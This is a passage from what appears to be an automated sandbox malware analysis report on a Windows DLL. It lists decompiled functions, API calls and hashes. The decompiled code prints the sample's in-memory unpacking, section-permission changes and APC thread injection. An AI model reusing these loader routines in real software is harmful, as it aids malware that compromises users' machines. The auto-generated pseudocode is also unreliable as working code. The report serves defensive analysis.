						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}

0x6d4713e8
0x6d4713ee
0x6d4713f2
0x6d4713fd
0x6d471405
0x6d47140e
0x6d471412
0x6d471419
0x6d471420
0x6d471422
0x6d471428
0x6d471405
0x6d47142c

APIs

CreateThread.KERNELBASE(00000000,00000000,00000000,?,6D474198,6D471E1E), ref: 6D4713E8
QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6D4713FD
GetLastError.KERNEL32(00000000), ref: 6D471408
TerminateThread.KERNEL32(00000000,00000000), ref: 6D471412
CloseHandle.KERNEL32(00000000), ref: 6D471419
SetLastError.KERNEL32(00000000), ref: 6D471422

Memory Dump Source

Source File: 00000000.00000002.924973104.000000006D471000.00000020.00020000.sdmp, Offset: 6D470000, based on PE: true

Associated: 00000000.00000002.924964633.000000006D470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.924982992.000000006D473000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.924990837.000000006D475000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.924998738.000000006D476000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d470000_loaddll32.jbxd

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: ea6d3791e94e37e3249778dac81e61bb2cc9fe512d398e02e615f2df4a114163
Instruction ID: f88731228cbbd44925437891da858b79f4abb2f6fb79c9cc1174e3fb601294bb
Opcode Fuzzy Hash: ea6d3791e94e37e3249778dac81e61bb2cc9fe512d398e02e615f2df4a114163
Instruction Fuzzy Hash: 09F015362056B1BBDB227FA08C0CFAFBB79FB0B755F104404F629A1258D721CC109BA2

Uniqueness

Uniqueness Score: -1.00%

Function 00DE161A, Relevance: 6.2, APIs: 4, Instructions: 152memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 00DE165B
SysFreeString.OLEAUT32(00000000), ref: 00DE173E

Part of subcall function 00DE6C6D: SysAllocString.OLEAUT32(00DE92B0), ref: 00DE6CBD

SafeArrayDestroy.OLEAUT32(?), ref: 00DE1792
SysFreeString.OLEAUT32(?), ref: 00DE17A0

Part of subcall function 00DE1FC2: Sleep.KERNELBASE(000001F4), ref: 00DE200A

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: String$AllocFree$ArrayDestroySafeSleep
String ID:
API String ID: 3193056040-0
Opcode ID: 1370e9231949075e48d00ee0596d215e952e3f381031e515a735f68aa5389b1a
Instruction ID: 83c461c0331de567f4591d35d9058a8b1a9ed2a98512efe9617503e7ec29b23e
Opcode Fuzzy Hash: 1370e9231949075e48d00ee0596d215e952e3f381031e515a735f68aa5389b1a
Instruction Fuzzy Hash: 4F51367AA00299EFCB00EFE9C88489EB7B6FF88741B144869E505DB210D771AD45CF71

Uniqueness

Uniqueness Score: -1.00%

Function 6D4718AD, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 111
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E6D4718AD(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				unsigned int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				void* _v36;
				signed int _v40;
				signed char _v44;
				void* _v48;
				signed int _v56;
				signed int _v60;
				intOrPtr _t50;
				void* _t57;
				void* _t61;
				signed int _t67;
				signed char _t69;
				signed char _t70;
				void* _t76;
				intOrPtr _t77;
				unsigned int _t82;
				intOrPtr _t86;
				intOrPtr* _t89;
				intOrPtr _t90;
				void* _t91;
				signed int _t93;

				_t90 =  *0x6d4741b0;
				_t50 = E6D471000(_t90,  &_v28,  &_v20);
				_v24 = _t50;
				if(_t50 == 0) {
					asm("sbb ebx, ebx");
					_t67 =  ~( ~(_v20 & 0x00000fff)) + (_v20 >> 0xc);
					_t91 = _t90 + _v28;
					_v48 = _t91;
					_t57 = VirtualAlloc(0, _t67 << 0xc, 0x3000, 4); // executed
					_t76 = _t57;
					_v36 = _t76;
					if(_t76 == 0) {
						_v24 = 8;
					} else {
						_t69 = 0;
						if(_t67 <= 0) {
							_t77 =  *0x6d4741cc;
						} else {
							_t86 = _a4;
							_v8 = _t91;
							_v8 = _v8 - _t76;
							_t14 = _t86 + 0x6d475137; // 0x3220a9c2
							_t61 = _t57 - _t91 + _t14;
							_v16 = _t76;
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t70 = _t69 + 1;
								_v44 = _t70;
								_t82 = (_v60 ^ _v56) + _v28 + _a4 >> _t70;
								if(_t82 != 0) {
									_v32 = _v32 & 0x00000000;
									_t89 = _v16;
									_v12 = 0x400;
									do {
										_t93 =  *((intOrPtr*)(_v8 + _t89));
										_v40 = _t93;
										if(_t93 == 0) {
											_v12 = 1;
										} else {
											 *_t89 = _t93 + _v32 - _t82;
											_v32 = _v40;
											_t89 = _t89 + 4;
										}
										_t33 =  &_v12;
										 *_t33 = _v12 - 1;
									} while ( *_t33 != 0);
								}
								_t69 = _v44;
								_t77 =  *((intOrPtr*)(_t61 + 0xc)) -  *((intOrPtr*)(_t61 + 8)) +  *((intOrPtr*)(_t61 + 4));
								_v16 = _v16 + 0x1000;
								 *0x6d4741cc = _t77;
							} while (_t69 < _t67);
						}
						if(_t77 != 0x63699bc3) {
							_v24 = 0xc;
						} else {
							memcpy(_v48, _v36, _v20);
						}
						VirtualFree(_v36, 0, 0x8000); // executed
					}
				}
				return _v24;
			}

0x6d4718b4
0x6d4718c4
0x6d4718cb
0x6d4718ce
0x6d4718e3
0x6d4718ea
0x6d4718ef
0x6d471900
0x6d471903
0x6d471909
0x6d47190d
0x6d471910
0x6d4719ec
0x6d471916
0x6d471916
0x6d47191a
0x6d4719b2
0x6d471920
0x6d471921
0x6d471926
0x6d471929
0x6d47192c
0x6d47192c
0x6d471933
0x6d471936
0x6d47193e
0x6d47193f
0x6d471940
0x6d471947
0x6d47194b
0x6d471951
0x6d471955
0x6d471957
0x6d47195b
0x6d47195e
0x6d471965
0x6d471968
0x6d47196d
0x6d471970
0x6d471986
0x6d471972
0x6d47197c
0x6d47197e
0x6d471981
0x6d471981
0x6d47198d
0x6d47198d
0x6d47198d
0x6d471965
0x6d471998
0x6d47199b
0x6d47199e
0x6d4719a7
0x6d4719a7
0x6d4719af
0x6d4719be
0x6d4719d3
0x6d4719c0
0x6d4719c9
0x6d4719ce
0x6d4719e4
0x6d4719e4
0x6d4719f3
0x6d4719f9

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 6D471903
memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 6D4719C9
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,00000000), ref: 6D4719E4

Strings

Jun 6 2021, xrefs: 6D471936

Memory Dump Source

Source File: 00000000.00000002.924973104.000000006D471000.00000020.00020000.sdmp, Offset: 6D470000, based on PE: true

Associated: 00000000.00000002.924964633.000000006D470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.924982992.000000006D473000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.924990837.000000006D475000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.924998738.000000006D476000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d470000_loaddll32.jbxd

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Jun 6 2021
API String ID: 4010158826-1013970402
Opcode ID: 1741e797d4b0b6abdafdb0188588536a60ab291a00581efc96b747953c0c6911
Instruction ID: 1ff53653ff3bdde4aac6da3e40e8feedeffe31dc86d69c0d02e36571b1b753e1
Opcode Fuzzy Hash: 1741e797d4b0b6abdafdb0188588536a60ab291a00581efc96b747953c0c6911
Instruction Fuzzy Hash: AA4148B1E0021AABDB14CF99C894BEEBBB5FF49310F248129D9047B344D775AE46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00DE5C35, Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 00DE5C8C
SysAllocString.OLEAUT32(00DE1E05), ref: 00DE5CCF
SysFreeString.OLEAUT32(00000000), ref: 00DE5CE3
SysFreeString.OLEAUT32(00000000), ref: 00DE5CF1

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: e931eff7552588e461aa816a48986b6c32b755d1a2bb52657beab1b46e38ea66
Instruction ID: 2752487df3499c54fa48d63ead64413fbe817363f9d7ade1726b54aadf59743c
Opcode Fuzzy Hash: e931eff7552588e461aa816a48986b6c32b755d1a2bb52657beab1b46e38ea66
Instruction Fuzzy Hash: EF31FB75900289EFCB05EF99D8D48AE7BB5FF48344B20842EF5099B210D7359985CF72

Uniqueness

Uniqueness Score: -1.00%

Function 6D4720CE, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6D4720CE(void* __ecx, intOrPtr _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E6D471C7D(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}

0x6d4720d7
0x6d4720dc
0x6d4720ea
0x6d4720ef
0x6d4720ef
0x6d4720f5
0x6d4720fa
0x6d4720fe
0x6d472102
0x6d472102
0x6d47210c
0x6d472115

APIs

GetCurrentThread.KERNEL32 ref: 6D4720D1
SetThreadAffinityMask.KERNEL32 ref: 6D4720DC
SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6D4720EF
SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6D472102

Memory Dump Source

Source File: 00000000.00000002.924973104.000000006D471000.00000020.00020000.sdmp, Offset: 6D470000, based on PE: true

Associated: 00000000.00000002.924964633.000000006D470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.924982992.000000006D473000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.924990837.000000006D475000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.924998738.000000006D476000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d470000_loaddll32.jbxd

Similarity

API ID: Thread$Priority$AffinityCurrentMask
String ID:
API String ID: 1452675757-0
Opcode ID: c1a6d57ff1217177d014bd1469a7f76a77c0e10c676903b17de45c39ab285431
Instruction ID: b6817d38f493fef8b0df87996ae1adfa6c2802ac46f60a4db81cfa759bebc2eb
Opcode Fuzzy Hash: c1a6d57ff1217177d014bd1469a7f76a77c0e10c676903b17de45c39ab285431
Instruction Fuzzy Hash: D6E092713056612FD6217A294CC8FBBAB6CEF833747120235F634D22D4CF54CC0589A5

Uniqueness

Uniqueness Score: -1.00%

Function 6D48D310, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 342COMMON

Download Yara Rule

APIs

GetTempPathA.KERNELBASE(00000646,C:\Users\user\Desktop), ref: 6D48D37C
GetModuleFileNameA.KERNEL32(00000000,?,00000646), ref: 6D48D43F

Strings

C:\Users\user\Desktop, xrefs: 6D48D36A, 6D48D4CE, 6D48D4F5, 6D48D509, 6D48D50A

Memory Dump Source

Source File: 00000000.00000002.925010654.000000006D47E000.00000020.00020000.sdmp, Offset: 6D47E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d47e000_loaddll32.jbxd

Similarity

API ID: FileModuleNamePathTemp
String ID: C:\Users\user\Desktop
API String ID: 1080798513-224404859
Opcode ID: 3ea6fbf8a786b1da3982ef28b78393b96b2cf92f4b885ffdee83d6032c983d25
Instruction ID: 461a61e051cd24f7d77c873864833d45579dc057daefe93e6abe196468a5d9a1
Opcode Fuzzy Hash: 3ea6fbf8a786b1da3982ef28b78393b96b2cf92f4b885ffdee83d6032c983d25
Instruction Fuzzy Hash: E1E16BB16052418FCB08EF38C994B6A7BF1BB9A344F59462EE84187386EBB4DC05CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00DE1AB8, Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00DE1AB8(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E00DE4C8C(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0xdea2d4; // 0x2f2d5a8
				_t4 = _t24 + 0xdebd60; // 0x3d19308
				_t5 = _t24 + 0xdebd08; // 0x4f0053
				_t26 = E00DE5384( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0xdea2d4; // 0x2f2d5a8
						_t11 = _t32 + 0xdebd54; // 0x3d192fc
						_t48 = _t11;
						_t12 = _t32 + 0xdebd08; // 0x4f0053
						_t52 = E00DE5D37(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0xdea2d4; // 0x2f2d5a8
							_t13 = _t35 + 0xdebd9e; // 0x30314549
							if(E00DE74B6(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0xdea2b4 - 6;
								if( *0xdea2b4 <= 6) {
									_t42 =  *0xdea2d4; // 0x2f2d5a8
									_t15 = _t42 + 0xdebbaa; // 0x52384549
									E00DE74B6(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0xdea2d4; // 0x2f2d5a8
							_t17 = _t38 + 0xdebd98; // 0x3d19340
							_t18 = _t38 + 0xdebd70; // 0x680043
							_t45 = E00DE1F7A(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0xdea290, 0, _t52);
						}
					}
					HeapFree( *0xdea290, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E00DE3C84(_t54);
				}
				return _t45;
			}

0x00de1ab8
0x00de1ac8
0x00de1acb
0x00de1ad2
0x00de1ad4
0x00de1ad4
0x00de1ad7
0x00de1adc
0x00de1ae3
0x00de1af0
0x00de1af5
0x00de1af9
0x00de1b07
0x00de1b15
0x00de1b19
0x00de1baa
0x00de1baa
0x00de1b1f
0x00de1b1f
0x00de1b24
0x00de1b24
0x00de1b2b
0x00de1b37
0x00de1b39
0x00de1b3b
0x00de1b3d
0x00de1b44
0x00de1b56
0x00de1b58
0x00de1b5f
0x00de1b61
0x00de1b68
0x00de1b73
0x00de1b73
0x00de1b5f
0x00de1b78
0x00de1b7d
0x00de1b84
0x00de1ba2
0x00de1ba4
0x00de1ba4
0x00de1b3b
0x00de1bb6
0x00de1bb6
0x00de1bb8
0x00de1bbd
0x00de1bbf
0x00de1bbf
0x00de1bca

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,03D19308,00000000,?,73BCF710,00000000,73BCF730), ref: 00DE1B07
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,03D19340,?,00000000,30314549,00000014,004F0053,03D192FC), ref: 00DE1BA4
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00DE20B0), ref: 00DE1BB6

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: d7d43bace14b8ea957708da94f70ecf59635bbaaae4aaeb15c7cb0eb73ee4c9d
Instruction ID: 7fc5571941d87b7949dc2171650936698598c3fcb935702514e8b31a928a8a12
Opcode Fuzzy Hash: d7d43bace14b8ea957708da94f70ecf59635bbaaae4aaeb15c7cb0eb73ee4c9d
Instruction Fuzzy Hash: 5931B135A002CABFCB11FB95DD84EAA7BBCFB44714F140196B605AB161D372AE04DB72

Uniqueness

Uniqueness Score: -1.00%

Function 00DE5F9A, Relevance: 4.6, APIs: 3, Instructions: 82
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00DE5F9A(intOrPtr* __eax, void* __ecx, void* __edx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
				void* _v8;
				char _v48;
				void* __edi;
				intOrPtr _t22;
				long _t29;
				intOrPtr _t33;
				intOrPtr* _t41;
				void* _t42;
				void* _t46;
				intOrPtr* _t47;
				void* _t48;
				intOrPtr _t50;

				_t46 = __edx;
				_t42 = __ecx;
				_t41 = _a16;
				_t47 = __eax;
				_t22 =  *0xdea2d4; // 0x2f2d5a8
				_t2 = _t22 + 0xdeb662; // 0x657a6973
				wsprintfA( &_v48, _t2,  *__eax,  *_t41);
				if( *0xdea2a4 >= 5) {
					_push( &_a16);
					_push( &_v8);
					_push( &_v48);
					_t29 = _a4;
					"QQSUVWh"();
					L5:
					_a4 = _t29;
					L6:
					if(_a4 != 0) {
						L9:
						 *0xdea2a4 =  *0xdea2a4 + 1;
						L10:
						return _a4;
					}
					_t49 = _a16;
					 *_t47 = _a16;
					_t48 = _v8;
					 *_t41 = E00DE283A(_t49, _t48);
					_t33 = E00DE738C(_t48, _t49);
					if(_t33 != 0) {
						 *_a8 = _t48;
						 *_a12 = _t33;
						if( *0xdea2a4 < 5) {
							 *0xdea2a4 =  *0xdea2a4 & 0x00000000;
						}
						goto L10;
					}
					_a4 = 0xbf;
					E00DE1492();
					HeapFree( *0xdea290, 0, _t48);
					goto L9;
				}
				_t50 =  *0xdea390; // 0x3d18d5d
				if(RtlAllocateHeap( *0xdea290, 0, 0x800) == 0) {
					_a4 = 8;
					goto L6;
				}
				_t29 = E00DE46D1(_a4, _t42, _t46, _t50,  &_v48,  &_v8,  &_a16, _t36); // executed
				goto L5;
			}

0x00de5f9a
0x00de5f9a
0x00de5fa1
0x00de5fa8
0x00de5fac
0x00de5fb1
0x00de5fbc
0x00de5fcc
0x00de600f
0x00de6013
0x00de6017
0x00de6018
0x00de601b
0x00de6020
0x00de6020
0x00de6023
0x00de6027
0x00de6061
0x00de6061
0x00de6067
0x00de606e
0x00de606e
0x00de6029
0x00de602c
0x00de602e
0x00de603b
0x00de603d
0x00de6044
0x00de607b
0x00de6080
0x00de6082
0x00de6084
0x00de6084
0x00000000
0x00de6082
0x00de6046
0x00de604d
0x00de605b
0x00000000
0x00de605b
0x00de5fce
0x00de5fe9
0x00de6003
0x00000000
0x00de6003
0x00de5ffc
0x00000000

APIs

wsprintfA.USER32 ref: 00DE5FBC
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00DE5FE1

Part of subcall function 00DE46D1: GetTickCount.KERNEL32 ref: 00DE46E8
Part of subcall function 00DE46D1: wsprintfA.USER32 ref: 00DE4735
Part of subcall function 00DE46D1: wsprintfA.USER32 ref: 00DE4752
Part of subcall function 00DE46D1: wsprintfA.USER32 ref: 00DE4772
Part of subcall function 00DE46D1: wsprintfA.USER32 ref: 00DE4790
Part of subcall function 00DE46D1: wsprintfA.USER32 ref: 00DE47B3
Part of subcall function 00DE46D1: wsprintfA.USER32 ref: 00DE47D4

HeapFree.KERNEL32(00000000,00DE20FA,?,?,00DE20FA,?), ref: 00DE605B

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: wsprintf$Heap$AllocateCountFreeTick
String ID:
API String ID: 2794511967-0
Opcode ID: e969a3d968d54e53ba025fea1ead8e583d0cbc7066e18fc895d0e968e9122a85
Instruction ID: eeedd6016a29277592d3608b6ed239e4c29ce07c761783819d1a815c3d78c79f
Opcode Fuzzy Hash: e969a3d968d54e53ba025fea1ead8e583d0cbc7066e18fc895d0e968e9122a85
Instruction Fuzzy Hash: AD313A7150029AAFCB01EF69DC84A9A3BB8FF18350F104026FA05EB251D731EA54CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 6D47126D, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6D47126D(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x6d4741cc;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x63699bbf;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x63699bc1;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x63699ba3;
					} else {
						_t54 = _t57 - 0x63699b83;
					}
					goto L9;
				}
				goto L12;
			}

0x6d471277
0x6d471284
0x6d47128a
0x6d471296
0x6d4712a6
0x6d4712a8
0x6d4712b0
0x6d471345
0x6d47134c
0x00000000
0x00000000
0x00000000
0x6d4712b6
0x6d4712b6
0x6d4712b6
0x6d4712ba
0x00000000
0x00000000
0x6d4712c6
0x6d4712ca
0x6d4712ee
0x6d4712f2
0x6d471306
0x6d471306
0x6d47130c
0x6d47131b
0x6d47131f
0x6d471327
0x6d471327
0x6d47132f
0x6d471332
0x6d47133f
0x00000000
0x00000000
0x00000000
0x00000000
0x6d47133f
0x6d4712fa
0x6d4712fe
0x6d471304
0x00000000
0x00000000
0x00000000
0x6d471304
0x6d4712d2
0x6d4712d6
0x6d4712e0
0x6d4712d8
0x6d4712d8
0x6d4712d8
0x00000000
0x6d4712d6
0x00000000

APIs

VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,00000002), ref: 6D4712A6
VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6D47131B
GetLastError.KERNEL32 ref: 6D471321

Memory Dump Source

Source File: 00000000.00000002.924973104.000000006D471000.00000020.00020000.sdmp, Offset: 6D470000, based on PE: true

Associated: 00000000.00000002.924964633.000000006D470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.924982992.000000006D473000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.924990837.000000006D475000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.924998738.000000006D476000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d470000_loaddll32.jbxd

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: 45a7e96d39157884e69959f5b02db2892e2f02aef200e9b9bbc5247234bdf97a
Instruction ID: 5c1202e261534112453682801e8c4db0876b95c2ed4cebb94a4f7e22f1de8717
Opcode Fuzzy Hash: 45a7e96d39157884e69959f5b02db2892e2f02aef200e9b9bbc5247234bdf97a
Instruction Fuzzy Hash: E421A03190060BDFCB20DF95C495EEAF7F9FF08349F004859D41697580E3B8AA94CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6D4714E8, Relevance: 4.6, APIs: 3, Instructions: 60
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E6D4714E8() {
				char _v28;
				void _v44;
				char _v48;
				void* _v52;
				long _t23;
				int _t24;
				void* _t28;
				intOrPtr* _t30;
				signed int _t34;
				intOrPtr _t36;

				_push(0);
				_push(0x6d4741c4);
				_push(1);
				_push( *0x6d4741d0 + 0x6d475089);
				 *0x6d4741c0 = 0xc;
				 *0x6d4741c8 = 0; // executed
				L6D471DA8(); // executed
				_t34 = 6;
				memset( &_v44, 0, _t34 << 2);
				if(E6D471697( &_v44,  &_v28,  *0x6d4741cc ^ 0xfd7cd1cf) == 0) {
					_t23 = 0xb;
					L7:
					ExitThread(_t23);
				}
				_t24 = lstrlenW( *0x6d4741b8);
				_t7 = _t24 + 2; // 0x2
				_t10 = _t24 + _t7 + 8; // 0xa
				_t28 = E6D471144(_t36, _t10,  &_v48,  &_v52); // executed
				if(_t28 == 0) {
					_t30 = _v52;
					 *_t30 = 0;
					if( *0x6d4741b8 == 0) {
						 *((short*)(_t30 + 4)) = 0;
					} else {
						E6D472118(_t40, _t30 + 4);
					}
				}
				_t23 = E6D471444(_v44); // executed
				goto L7;
			}

0x6d4714fa
0x6d4714fb
0x6d471500
0x6d471508
0x6d471509
0x6d471513
0x6d471519
0x6d471522
0x6d471527
0x6d471545
0x6d47159a
0x6d47159b
0x6d47159c
0x6d47159c
0x6d47154d
0x6d471553
0x6d471561
0x6d471565
0x6d47156c
0x6d471574
0x6d471578
0x6d47157a
0x6d471589
0x6d47157c
0x6d471582
0x6d471582
0x6d47157a
0x6d471591
0x00000000

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,6D4741C4,00000000), ref: 6D471519
lstrlenW.KERNEL32(?,?,?), ref: 6D47154D

Part of subcall function 6D471144: GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6D47156A,0000000A,?,?), ref: 6D471151
Part of subcall function 6D471144: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6D471167
Part of subcall function 6D471144: _snwprintf.NTDLL ref: 6D47118C
Part of subcall function 6D471144: CreateFileMappingW.KERNELBASE(000000FF,6D4741C0,00000004,00000000,?,?), ref: 6D4711B1
Part of subcall function 6D471144: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6D47156A,0000000A,?), ref: 6D4711C8
Part of subcall function 6D471144: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6D47156A,0000000A), ref: 6D4711FD

ExitThread.KERNEL32 ref: 6D47159C

Memory Dump Source

Source File: 00000000.00000002.924973104.000000006D471000.00000020.00020000.sdmp, Offset: 6D470000, based on PE: true

Associated: 00000000.00000002.924964633.000000006D470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.924982992.000000006D473000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.924990837.000000006D475000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.924998738.000000006D476000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d470000_loaddll32.jbxd

Similarity

API ID: DescriptorFileSecurityTime$CloseConvertCreateErrorExitHandleLastMappingStringSystemThread_aulldiv_snwprintflstrlen
String ID:
API String ID: 4209869662-0
Opcode ID: 71a73cde9895a232ee2e58434a54b6151ba74c076069e91b54dd364ef262375f
Instruction ID: 394644d3757e5ad077f8f8d956435da5024f0cb84f4b2ecf2da94d308e70f2f4
